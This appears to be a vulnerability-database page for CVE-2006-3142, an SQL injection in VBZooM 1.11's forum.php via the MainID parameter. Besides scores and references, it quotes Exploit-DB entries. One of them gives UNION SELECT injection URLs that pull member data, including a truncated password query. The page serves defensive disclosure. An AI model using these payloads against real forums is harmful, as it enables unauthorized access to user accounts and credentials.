CVE-2006-3142
published 2006-06-22CVE-2006-3142: SQL injection vulnerability in forum.php in VBZooM 1.11 allows remote attackers to execute arbitrary SQL commands via the MainID parameter.
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.12%
62.0th percentile
SQL injection vulnerability in forum.php in VBZooM 1.11 allows remote attackers to execute arbitrary SQL commands via the MainID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbzoom | vbzoom | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
vbzoom 1.x - 'forum.php?MainID' SQL Injection
exploitdb·2007-07-02
CVE-2006-3142 vbzoom 1.x - 'forum.php?MainID' SQL Injection
vbzoom 1.x - 'forum.php?MainID' SQL Injection
---
--/ Long Life Palestine --
HHHHHH HHHHHH HH HHHHHH HHHHHH HHHHHHHH HHHH HH HH HHHHHH
HH HH HH HH HH HHHHH HH HH HH HHH HH HHHHH
HH HH HH HH HH HH HH HH HH HHHH HH HH
HHHHHH HHHHHH HH HHHHH HHHHHH HH HH HH HH HH HHHHHH
HH HH HH HH HH HH HH HH HH HHHH HH
HH HH HH HH HHHHH HH HH HH HH HHH HHHHH
HH HH HH HHHHHHH HHHHHH HHHHHH HH HHHH HH HH HHHHHH
HH HH HHHHHH HHHHHH HH HH HHHHHH HHHHHH
HH HH HH HH HHHHHH HH HH HHHHH HHH HHH
HH HH HH HH HH HH HH HH HH HH
HHHHHH HHHHHH HH HHHH HHHHHH HHHHH
HH HH HH HH HH HH HH HH HH HH
HH HH HH HH HHHHHH HH HH HHHHH HH HH
HH HH HH HH HHHHHH HH HH HHHHHH HH HH
--/ Long Life Palestine --
vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities
Found By : Cold z3ro , [email protected]
Homepages :
Exploit-DB
VBZoom 1.11 - 'forum.php' SQL Injection
exploitdb·2006-06-15
CVE-2006-3142 VBZoom 1.11 - 'forum.php' SQL Injection
VBZoom 1.11 - 'forum.php' SQL Injection
---
source: https://www.securityfocus.com/bid/18472/info
VBZooM is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
For user :
http://www.example.com/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
Or
http://www.example.com/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*
For Password :
http://www.example.com/forum.php?MainID=-1%20union%20
No writeups or analysis indexed.
http://securityreason.com/securityalert/1122http://www.securityfocus.com/archive/1/437575/100/0/threadedhttp://www.securityfocus.com/bid/18472https://exchange.xforce.ibmcloud.com/vulnerabilities/27700https://www.exploit-db.com/exploits/4140http://securityreason.com/securityalert/1122http://www.securityfocus.com/archive/1/437575/100/0/threadedhttp://www.securityfocus.com/bid/18472https://exchange.xforce.ibmcloud.com/vulnerabilities/27700https://www.exploit-db.com/exploits/4140
2006-06-22
Published